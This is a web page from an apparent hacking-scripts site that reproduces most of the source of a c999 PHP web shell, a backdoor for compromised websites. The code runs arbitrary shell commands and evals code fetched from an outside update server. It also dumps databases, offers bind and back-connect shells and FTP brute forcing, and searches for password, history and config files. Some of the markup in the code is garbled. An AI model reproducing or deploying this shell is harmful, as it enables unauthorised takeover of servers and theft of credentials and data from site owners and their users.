HackingScripts

Hack Scripts for everybody

C999 shell

24 Jan 2014

This was the very first hack script uploaded to my website, so it holds a special place in my heart.

It’s a version of the c99 shell script, which is used by hackers (read: script kiddies) to gain backdoor entry into insecure websites.

It appears to be incomplete (I added the final ‘?>’), perhaps because the end of the script was cut off during the upload process. Note that this script is only just over 1100 lines long, while the complete C99 shell is about 2000 lines longer!

I have received many more C99 scripts since this one, most of them complete and more up-to-date than this one.

C999 Shell Script Source Code

   1 <?php //Starting calls if (!function_exists("getmicrotime")) {function getmicrotime() { list($usec, $sec) = explode(" ", microtime());  return ((float)$usec + (float)$sec);}} error_reporting(5); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS,0,3)) == "win"; define("starttime",getmicrotime()); if (get_magic_quotes_gpc()) {if (!function_exists("strips")) { function strips(&$arr,$k="") {if (is_array($arr))  {foreach($arr as $k=-->$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}}
   2 else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
   3 $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
   4 foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
   5 $shver = "1.0 pre-release build #16"; //Current version
   6 //CONFIGURATION AND SETTINGS
   7 if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
   8 elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
   9 else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
  10 }
  11 $surl_autofill_include = TRUE; //If TRUE then search variables with
  12                                //descriptors (URLs) and save it in SURL.
  13 if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach
  14 (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v);
  15 $name = urldecode($v[0]);
  16 $value = urldecode($v[1]);
  17 foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
  18 if (strpos($value,$needle) === 0) {
  19 $includestr .= urlencode($name)."=".urlencode($value)."&";}}}
  20 if ($_REQUEST["surl_autofill_include"]) {
  21 $includestr .= "surl_autofill_include=1&";}}
  22 if (empty($surl))
  23 {
  24  $surl = "?".$includestr; //Self url
  25 }
  26 $surl = htmlspecialchars($surl);
  27 $timelimit = 0; //time limit of execution this script over server quote
  28                 //(seconds), 0 = unlimited.
  29 //Authentication
  30 $login = ""; //login
  31 //DON'T FORGOT ABOUT PASSWORD!!!
  32 $pass = ""; //password
  33 $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
  34 $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
  35 $login_txt = "Restricted area"; //http-auth message.
  36 $accessdeniedmess = "<a href="\&quot;http://ccteam.ru/releases/c999shell\&quot;">c999shell v.".$shver."</a>: access denied";
  37 $gzipencode = TRUE; //Encode with gzip?
  38 $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
  39 $c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server
  40 $c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server
  41 $filestealth = TRUE; //if TRUE, don't change modify- and access-time
  42 $donated_html = "</pre>
  43 <center><b>Owned by hacker</b></center>
  44 <pre>";
  45 /* If you publish free shell and you wish
  46 add link to your site or any other information,
  47 put here your html. */
  48 $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  49 $curdir = "./"; //start folder
  50 //$curdir = getenv("DOCUMENT_ROOT");
  51 $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  52 $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  53 $log_email = "user@host.tld"; //Default e-mail for sending logs
  54 $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  55 $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
  56 // Registered file-types.
  57 //  array(
  58 //   "{action1}"=>array("ext1","ext2","ext3",...),
  59 //   "{action2}"=>array("ext4","ext5","ext6",...),
  60 //   ...
  61 //  )
  62 $ftypes  = array(
  63  "html"=>array("html","htm","shtml"),
  64  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  65  "exe"=>array("sh","install","bat","cmd"),
  66  "ini"=>array("ini","inf"),
  67  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  68  "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  69  "sdb"=>array("sdb"),
  70  "phpsess"=>array("sess"),
  71  "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  72 );
  73 // Registered executable file-types.
  74 //  array(
  75 //   string "command{i}"=>array("ext1","ext2","ext3",...),
  76 //   ...
  77 //  )
  78 //   {command}: %f% = filename
  79 $exeftypes  = array(
  80  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  81  "perl %f%" => array("pl","cgi")
  82 );
  83 /* Highlighted files.
  84   array(
  85    i=>array({regexp},{type},{opentag},{closetag},{break})
  86    ...
  87   )
  88   string {regexp} - regular exp.
  89   int {type}:
  90 0 - files and folders (as default),
  91 1 - files only, 2 - folders only
  92   string {opentag} - open html-tag, e.g. "<b>" (default)
  93   string {closetag} - close html-tag, e.g. "</b>" (default)
  94   bool {break} - if TRUE and found match then break
  95 */
  96 $regxp_highlight  = array(
  97   array(basename($_SERVER["PHP_SELF"]),1,"</pre>
  98 <span>","</span>
  99 <pre>"), // example
 100   array("config.php",1) // example
 101 );
 102 $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
 103  // array (i=>{letter} ...); string {letter} - letter of a drive
 104 //$safemode_diskettes = range("a","z");
 105 $hexdump_lines = 8;// lines in hex preview file
 106 $hexdump_rows = 24;// 16, 24 or 32 bytes in one line
 107 $nixpwdperpage = 100; // Get first N lines from /etc/passwd
 108 $bindport_pass = "c999";  // default password for binding
 109 $bindport_port = "31373"; // default port for binding
 110 $bc_port = "31373"; // default port for back-connect
 111 $datapipe_localport = "8081"; // default port for datapipe
 112 // Command-aliases
 113 if (!$win)
 114 {
 115  $cmdaliases = array(
 116   array("-----------------------------------------------------------", "ls -la"),
 117   array("find all suid files", "find / -type f -perm -04000 -ls"),
 118   array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
 119   array("find all sgid files", "find / -type f -perm -02000 -ls"),
 120   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
 121   array("find config.inc.php files", "find / -type f -name config.inc.php"),
 122   array("find config* files", "find / -type f -name \"config*\""),
 123   array("find config* files in current dir", "find . -type f -name \"config*\""),
 124   array("find all writable folders and files", "find / -perm -2 -ls"),
 125   array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
 126   array("find all service.pwd files", "find / -type f -name service.pwd"),
 127   array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
 128   array("find all .htpasswd files", "find / -type f -name .htpasswd"),
 129   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
 130   array("find all .bash_history files", "find / -type f -name .bash_history"),
 131   array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
 132   array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
 133   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
 134   array("list file attributes on a Linux second extended file system", "lsattr -va"),
 135   array("show opened ports", "netstat -an | grep -i listen")
 136  );
 137 }
 138 else
 139 {
 140  $cmdaliases = array(
 141   array("-----------------------------------------------------------", "dir"),
 142   array("show opened ports", "netstat -an")
 143  );
 144 }
 145 $sess_cookie = "c999shvars"; // Cookie-variable name
 146 $usefsbuff = TRUE; //Buffer-function
 147 $copy_unset = FALSE; //Remove copied files from buffer after pasting
 148 //Quick launch
 149 $quicklaunch = array(
 150  array("<img alt="\&quot;Home\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=home\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",$surl),
 151  array("<img alt="\&quot;Back\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=back\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />","#\" onclick=\"history.back(1)"),
 152  array("<img alt="\&quot;Forward\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=forward\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />","#\" onclick=\"history.go(1)"),
 153  array("<img alt="\&quot;UPDIR\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=up\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",$surl."act=ls&d=%upd&sort=%sort"),
 154  array("<img alt="\&quot;Refresh\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=refresh\&quot;" width="\&quot;17\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",""),
 155  array("<img alt="\&quot;Search\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=search\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",$surl."act=search&d=%d"),
 156  array("<img alt="\&quot;Buffer\&quot;" src="\&quot;&quot;.$surl.&quot;act=img&img=buffer\&quot;" width="\&quot;20\&quot;" height="\&quot;20\&quot;" border="\&quot;0\&quot;" />",$surl."act=fsbuff&d=%d"),
 157  array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
 158  array("<b>Tools</b>",$surl."act=tools&d=%d"),
 159  array("<b>Proc.</b>",$surl."act=processes&d=%d"),
 160  array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
 161  array("<b>Sec.</b>",$surl."act=security&d=%d"),
 162  array("<b>SQL</b>",$surl."act=sql&d=%d"),
 163  array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
 164  array("<b>Update</b>",$surl."act=update&d=%d"),
 165  array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
 166  array("<b>Self remove</b>",$surl."act=selfremove"),
 167  array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
 168 );
 169 //Highlight-code colors
 170 $highlight_background = "#c0c0c0";
 171 $highlight_bg = "#FFFFFF";
 172 $highlight_comment = "#6A6A6A";
 173 $highlight_default = "#0000BB";
 174 $highlight_html = "#1300FF";
 175 $highlight_keyword = "#007700";
 176 $highlight_string = "#000000";
 177 @$f = $_REQUEST["f"];
 178 @extract($_REQUEST["c999shcook"]);
 179 //END CONFIGURATION
 180 // \/Next code isn't for editing\/
 181 @set_time_limit(0);
 182 $tmp = array();
 183 foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
 184 $s = "!^(".implode("|",$tmp).")$!i";
 185 if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href="\&quot;http://ccteam.ru/releases/cc999shell\&quot;">c999shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
 186 if (!empty($login))
 187 {
 188  if (empty($md5_pass)) {$md5_pass = md5($pass);}
 189  if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
 190  {
 191   if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
 192 "," ",$donated_html));}
 193   header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\"");
 194   header("HTTP/1.0 401 Unauthorized");
 195   exit($accessdeniedmess);
 196  }
 197 }
 198 if ($act != "img")
 199 {
 200 $lastdir = realpath(".");
 201 chdir($curdir);
 202 if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;}
 203 $sess_data = unserialize($_COOKIE["$sess_cookie"]);
 204 if (!is_array($sess_data)) {$sess_data = array();}
 205 if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
 206 if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
 207 $disablefunc = @ini_get("disable_functions");
 208 if (!empty($disablefunc))
 209 {
 210  $disablefunc = str_replace(" ","",$disablefunc);
 211  $disablefunc = explode(",",$disablefunc);
 212 }
 213 if (!function_exists("c999_buff_prepare"))
 214 {
 215 function c999_buff_prepare()
 216 {
 217  global $sess_data;
 218  global $act;
 219  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 220  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 221  $sess_data["copy"] = array_unique($sess_data["copy"]);
 222  $sess_data["cut"] = array_unique($sess_data["cut"]);
 223  sort($sess_data["copy"]);
 224  sort($sess_data["cut"]);
 225  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
 226  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
 227 }
 228 }
 229 c999_buff_prepare();
 230 if (!function_exists("c999_sess_put"))
 231 {
 232 function c999_sess_put($data)
 233 {
 234  global $sess_cookie;
 235  global $sess_data;
 236  c999_buff_prepare();
 237  $sess_data = $data;
 238  $data = serialize($data);
 239  setcookie($sess_cookie,$data);
 240 }
 241 }
 242 foreach (array("sort","sql_sort") as $v)
 243 {
 244  if (!empty($_GET[$v])) {$$v = $_GET[$v];}
 245  if (!empty($_POST[$v])) {$$v = $_POST[$v];}
 246 }
 247 if ($sort_save)
 248 {
 249  if (!empty($sort)) {setcookie("sort",$sort);}
 250  if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
 251 }
 252 if (!function_exists("str2mini"))
 253 {
 254 function str2mini($content,$len)
 255 {
 256  if (strlen($content) > $len)
 257  {
 258   $len = ceil($len/2) - 2;
 259   return substr($content, 0,$len)."...".substr($content,-$len);
 260  }
 261  else {return $content;}
 262 }
 263 }
 264 if (!function_exists("view_size"))
 265 {
 266 function view_size($size)
 267 {
 268  if (!is_numeric($size)) {return FALSE;}
 269  else
 270  {
 271   if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
 272   elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
 273   elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
 274   else {$size = $size . " B";}
 275   return $size;
 276  }
 277 }
 278 }
 279 if (!function_exists("fs_copy_dir"))
 280 {
 281 function fs_copy_dir($d,$t)
 282 {
 283  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 284  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 285  $h = opendir($d);
 286  while (($o = readdir($h)) !== FALSE)
 287  {
 288   if (($o != ".") and ($o != ".."))
 289   {
 290    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
 291    else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
 292    if (!$ret) {return $ret;}
 293   }
 294  }
 295  closedir($h);
 296  return TRUE;
 297 }
 298 }
 299 if (!function_exists("fs_copy_obj"))
 300 {
 301 function fs_copy_obj($d,$t)
 302 {
 303  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 304  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 305  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
 306  if (is_dir($d))
 307  {
 308   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 309   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
 310   return fs_copy_dir($d,$t);
 311  }
 312  elseif (is_file($d)) {return copy($d,$t);}
 313  else {return FALSE;}
 314 }
 315 }
 316 if (!function_exists("fs_move_dir"))
 317 {
 318 function fs_move_dir($d,$t)
 319 {
 320  $h = opendir($d);
 321  if (!is_dir($t)) {mkdir($t);}
 322  while (($o = readdir($h)) !== FALSE)
 323  {
 324   if (($o != ".") and ($o != ".."))
 325   {
 326    $ret = TRUE;
 327    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
 328    else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
 329    if (!$ret) {return $ret;}
 330   }
 331  }
 332  closedir($h);
 333  return TRUE;
 334 }
 335 }
 336 if (!function_exists("fs_move_obj"))
 337 {
 338 function fs_move_obj($d,$t)
 339 {
 340  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 341  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 342  if (is_dir($d))
 343  {
 344   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 345   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
 346   return fs_move_dir($d,$t);
 347  }
 348  elseif (is_file($d))
 349  {
 350   if(copy($d,$t)) {return unlink($d);}
 351   else {unlink($t); return FALSE;}
 352  }
 353  else {return FALSE;}
 354 }
 355 }
 356 if (!function_exists("fs_rmdir"))
 357 {
 358 function fs_rmdir($d)
 359 {
 360  $h = opendir($d);
 361  while (($o = readdir($h)) !== FALSE)
 362  {
 363   if (($o != ".") and ($o != ".."))
 364   {
 365    if (!is_dir($d.$o)) {unlink($d.$o);}
 366    else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
 367   }
 368  }
 369  closedir($h);
 370  rmdir($d);
 371  return !is_dir($d);
 372 }
 373 }
 374 if (!function_exists("fs_rmobj"))
 375 {
 376 function fs_rmobj($o)
 377 {
 378  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
 379  if (is_dir($o))
 380  {
 381   if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
 382   return fs_rmdir($o);
 383  }
 384  elseif (is_file($o)) {return unlink($o);}
 385  else {return FALSE;}
 386 }
 387 }
 388 if (!function_exists("myshellexec"))
 389 {
 390 function myshellexec($cmd)
 391 {
 392  global $disablefunc;
 393  $result = "";
 394  if (!empty($cmd))
 395  {
 396   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
 397   elseif (($result = `$cmd`) !== FALSE) {}
 398   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
 399   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
 400   elseif (is_resource($fp = popen($cmd,"r")))
 401   {
 402    $result = "";
 403    while(!feof($fp)) {$result .= fread($fp,1024);}
 404    pclose($fp);
 405   }
 406  }
 407  return $result;
 408 }
 409 }
 410 if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
 411 if (!function_exists("view_perms"))
 412 {
 413 function view_perms($mode)
 414 {
 415  if (($mode & 0xC000) === 0xC000) {$type = "s";}
 416  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 417  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 418  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 419  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 420  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 421  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 422  else {$type = "?";}
 423  $owner["read"] = ($mode & 00400)?"r":"-";
 424  $owner["write"] = ($mode & 00200)?"w":"-";
 425  $owner["execute"] = ($mode & 00100)?"x":"-";
 426  $group["read"] = ($mode & 00040)?"r":"-";
 427  $group["write"] = ($mode & 00020)?"w":"-";
 428  $group["execute"] = ($mode & 00010)?"x":"-";
 429  $world["read"] = ($mode & 00004)?"r":"-";
 430  $world["write"] = ($mode & 00002)? "w":"-";
 431  $world["execute"] = ($mode & 00001)?"x":"-";
 432  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
 433  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
 434  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
 435  return $type.join("",$owner).join("",$group).join("",$world);
 436 }
 437 }
 438 if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
 439 if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
 440 if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
 441 if (!function_exists("parse_perms"))
 442 {
 443 function parse_perms($mode)
 444 {
 445  if (($mode & 0xC000) === 0xC000) {$t = "s";}
 446  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 447  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 448  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 449  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 450  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 451  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 452  else {$t = "?";}
 453  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 454  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 455  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 456  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
 457 }
 458 }
 459 if (!function_exists("parsesort"))
 460 {
 461 function parsesort($sort)
 462 {
 463  $one = intval($sort);
 464  $second = substr($sort,-1);
 465  if ($second != "d") {$second = "a";}
 466  return array($one,$second);
 467 }
 468 }
 469 if (!function_exists("view_perms_color"))
 470 {
 471 function view_perms_color($o)
 472 {
 473  if (!is_readable($o)) {return "</pre>
 474 <span style="color: red;">".view_perms(fileperms($o))."</span>
 475 <pre>";}
 476  elseif (!is_writable($o)) {return "</pre>
 477 <span style="color: white;">".view_perms(fileperms($o))."</span>
 478 <pre>";}
 479  else {return "</pre>
 480 <span style="color: green;">".view_perms(fileperms($o))."</span>
 481 <pre>";}
 482 }
 483 }
 484 if (!function_exists("c999getsource"))
 485 {
 486 function c999getsource($fn)
 487 {
 488  global $c999sh_sourcesurl;
 489  $array = array(
 490   "c999sh_bindport.pl" => "c999sh_bindport_pl.txt",
 491   "c999sh_bindport.c" => "c999sh_bindport_c.txt",
 492   "c999sh_backconn.pl" => "c999sh_backconn_pl.txt",
 493   "c999sh_backconn.c" => "c999sh_backconn_c.txt",
 494   "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",
 495   "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",
 496  );
 497  $name = $array[$fn];
 498  if ($name) {return file_get_contents($c999sh_sourcesurl.$name);}
 499  else {return FALSE;}
 500 }
 501 }
 502 if (!function_exists("c999sh_getupdate"))
 503 {
 504 function c999sh_getupdate($update = TRUE)
 505 {
 506  $url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
 507  $data = @file_get_contents($url);
 508  if (!$data) {return "Can't connect to update-server!";}
 509  else
 510  {
 511   $data = ltrim($data);
 512   $string = substr($data,3,ord($data{2}));
 513   if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
 514   if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
 515   if ($data{0} == "\x99" and $data{1} == "\x03")
 516   {
 517    $string = explode("\x01",$string);
 518    if ($update)
 519    {
 520     $confvars = array();
 521     $sourceurl = $string[0];
 522     $source = file_get_contents($sourceurl);
 523     if (!$source) {return "Can't fetch update!";}
 524     else
 525     {
 526      $fp = fopen(__FILE__,"w");
 527      if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href="\&quot;&quot;.$sourceurl.&quot;\&quot;"><span style="text-decoration: underline;">here</span></a>.";}
 528      else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
 529     }
 530    }
 531    else {return "New version are available: ".$string[1];}
 532   }
 533   elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
 534   else {return "Error in protocol: segmentation failed! (".$data.") ";}
 535  }
 536 }
 537 }
 538 if (!function_exists("mysql_dump"))
 539 {
 540 function mysql_dump($set)
 541 {
 542  global $shver;
 543  $sock = $set["sock"];
 544  $db = $set["db"];
 545  $print = $set["print"];
 546  $nl2br = $set["nl2br"];
 547  $file = $set["file"];
 548  $add_drop = $set["add_drop"];
 549  $tabs = $set["tabs"];
 550  $onlytabs = $set["onlytabs"];
 551  $ret = array();
 552  $ret["err"] = array();
 553  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
 554  if (empty($db)) {$db = "db";}
 555  if (empty($print)) {$print = 0;}
 556  if (empty($nl2br)) {$nl2br = 0;}
 557  if (empty($add_drop)) {$add_drop = TRUE;}
 558  if (empty($file))
 559  {
 560   $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
 561  }
 562  if (!is_array($tabs)) {$tabs = array();}
 563  if (empty($add_drop)) {$add_drop = TRUE;}
 564  if (sizeof($tabs) == 0)
 565  {
 566   // retrive tables-list
 567   $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
 568   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
 569  }
 570  $out = "# Dumped by c999Shell.SQL v. ".$shver."
 571 # Home page: http://ccteam.ru
 572 #
 573 # Host settings:
 574 # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
 575 # Date: ".date("d.m.Y H:i:s")."
 576 # DB: \"".$db."\"
 577 #---------------------------------------------------------
 578 ";
 579  $c = count($onlytabs);
 580  foreach($tabs as $tab)
 581  {
 582   if ((in_array($tab,$onlytabs)) or (!$c))
 583   {
 584    if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
 585    // recieve query for create table structure
 586    $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
 587    if (!$res) {$ret["err"][] = mysql_smarterror();}
 588    else
 589    {
 590     $row = mysql_fetch_row($res);
 591     $out .= $row["1"].";\n\n";
 592     // recieve table variables
 593     $res = mysql_query("SELECT * FROM `$tab`", $sock);
 594     if (mysql_num_rows($res) > 0)
 595     {
 596      while ($row = mysql_fetch_assoc($res))
 597      {
 598       $keys = implode("`, `", array_keys($row));
 599       $values = array_values($row);
 600       foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
 601       $values = implode("', '", $values);
 602       $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
 603       $out .= $sql;
 604      }
 605     }
 606    }
 607   }
 608  }
 609  $out .= "#---------------------------------------------------------------------------------\n\n";
 610  if ($file)
 611  {
 612   $fp = fopen($file, "w");
 613   if (!$fp) {$ret["err"][] = 2;}
 614   else
 615   {
 616    fwrite ($fp, $out);
 617    fclose ($fp);
 618   }
 619  }
 620  if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
 621  return $out;
 622 }
 623 }
 624 if (!function_exists("mysql_buildwhere"))
 625 {
 626 function mysql_buildwhere($array,$sep=" and",$functs=array())
 627 {
 628  if (!is_array($array)) {$array = array();}
 629  $result = "";
 630  foreach($array as $k=>$v)
 631  {
 632   $value = "";
 633   if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
 634   $value .= "'".addslashes($v)."'";
 635   if (!empty($functs[$k])) {$value .= ")";}
 636   $result .= "`".$k."` = ".$value.$sep;
 637  }
 638  $result = substr($result,0,strlen($result)-strlen($sep));
 639  return $result;
 640 }
 641 }
 642 if (!function_exists("mysql_fetch_all"))
 643 {
 644 function mysql_fetch_all($query,$sock)
 645 {
 646  if ($sock) {$result = mysql_query($query,$sock);}
 647  else {$result = mysql_query($query);}
 648  $array = array();
 649  while ($row = mysql_fetch_array($result)) {$array[] = $row;}
 650  mysql_free_result($result);
 651  return $array;
 652 }
 653 }
 654 if (!function_exists("mysql_smarterror"))
 655 {
 656 function mysql_smarterror($type,$sock)
 657 {
 658  if ($sock) {$error = mysql_error($sock);}
 659  else {$error = mysql_error();}
 660  $error = htmlspecialchars($error);
 661  return $error;
 662 }
 663 }
 664 if (!function_exists("mysql_query_form"))
 665 {
 666 function mysql_query_form()
 667 {
 668  global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
 669  if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b>
 670 ".$sql_query_error."
 671 ";}
